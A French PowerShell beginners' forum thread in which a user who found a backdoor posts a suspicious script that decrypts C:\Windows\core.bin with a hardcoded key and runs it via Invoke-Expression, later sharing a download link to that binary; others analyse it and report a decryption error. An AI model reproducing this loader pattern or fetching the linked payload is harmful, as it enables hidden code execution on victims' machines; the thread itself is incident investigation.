1. forum
  3. PowerShell
  5. Entraide pour les débutants
  7. Script sur ma machine

Question Script sur ma machine

Plus d'informations
il y a 2 ans 2 mois - il y a 2 ans 2 mois #31739 par Dezio
Script sur ma machine a été créé par Dezio
Bonjour,

Après avoir détecté une backdoor dans ma machine et des fichiers étranges dans ma liste d'exclusion DEFENDER j'ai trouvé ce petit script powershell, je ne suis pas très bon mais il semble décrypter un fichier que je n'ai pas trouvé ?


function Execute-EncryptedScript($path) {
  trap { Write-Host -fore Red "You are not authorized to decrypt and execute this script"; continue }
  & {
    $raw = Get-Content $path
    $key = (convertto-securestring -string "8EtaBkwkJw3hxXug" -asplaintext -force)
    $helper = New-Object system.Management.Automation.PSCredential("test", $key)
    $key = $helper.GetNetworkCredential().Password
    $secure = ConvertTo-SecureString $raw -key (([int[]][char[]]$key)[0..15]) -ea Stop
    $helper = New-Object system.Management.Automation.PSCredential("test", $secure)
    $plain = $helper.GetNetworkCredential().Password
    Invoke-Expression $plain
  }
}

Execute-EncryptedScript $env:windir\core.bin
Dernière édition: il y a 2 ans 2 mois par Dezio.

Connexion ou Créer un compte pour participer à la conversation.

Plus d'informations
il y a 2 ans 2 mois #31740 par ericlm128
Réponse de ericlm128 sur le sujet Script sur ma machine
Etrange, mais je ne vois pas de clé wifi.

Ce script semble juste, comme le nom de la fonction l'indique, exécuter un script crypté core.bin se trouvant dans Windows
Les utilisateur(s) suivant ont remercié: Dezio

Connexion ou Créer un compte pour participer à la conversation.

Plus d'informations
il y a 2 ans 2 mois #31741 par ericlm128
Réponse de ericlm128 sur le sujet Script sur ma machine
Ca ne semble pas être un superbe algorithme de cryptage si tu avait core.bin on aurait pu voir ce qu'il contenait ... dommage
Les utilisateur(s) suivant ont remercié: Dezio

Connexion ou Créer un compte pour participer à la conversation.

Plus d'informations
il y a 2 ans 2 mois #31743 par Dezio
Réponse de Dezio sur le sujet Script sur ma machine
J'ai finalement réussi à récupérer le BIN, avez-vous des conseils pour pousser mon investigation ? Merci de votre aide
mega.nz/file/4RcR2SaA#EZEP0qFUVewVLthb7s...oEVVtVzyIFxRtxN2qD70

Connexion ou Créer un compte pour participer à la conversation.

Plus d'informations
il y a 2 ans 2 mois #31744 par ericlm128
Réponse de ericlm128 sur le sujet Script sur ma machine
Tu diras au développeur qu'il a un bug ici $secure = ConvertTo-SecureString $raw -key (([int[]][char[]]$key)[0..15]) -ea Stop

ConvertTo-SecureString : Le remplissage n'est pas valide et ne peut pas être supprimé.
Au caractère C:\Users\Rico\Desktop\Sans titre2.ps1:23 : 11
+ $secure = ConvertTo-SecureString $raw -key (([int[]][char[]]$key)[0.. ...
+           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument : (:) [ConvertTo-SecureString], CryptographicException
    + FullyQualifiedErrorId : ImportSecureString_InvalidArgument_CryptographicError,Microsoft.PowerShell.Commands.ConvertToSecureStringCommand

Connexion ou Créer un compte pour participer à la conversation.

Plus d'informations
il y a 2 ans 2 mois #31745 par ericlm128
Réponse de ericlm128 sur le sujet Script sur ma machine
A moins qu'il est été encrpytée avec une autre clé que 8EtaBkwkJw3hxXug

Connexion ou Créer un compte pour participer à la conversation.

  1. forum
  3. PowerShell
  5. Entraide pour les débutants
  7. Script sur ma machine
Temps de génération de la page : 0.080 secondes
Propulsé par Kunena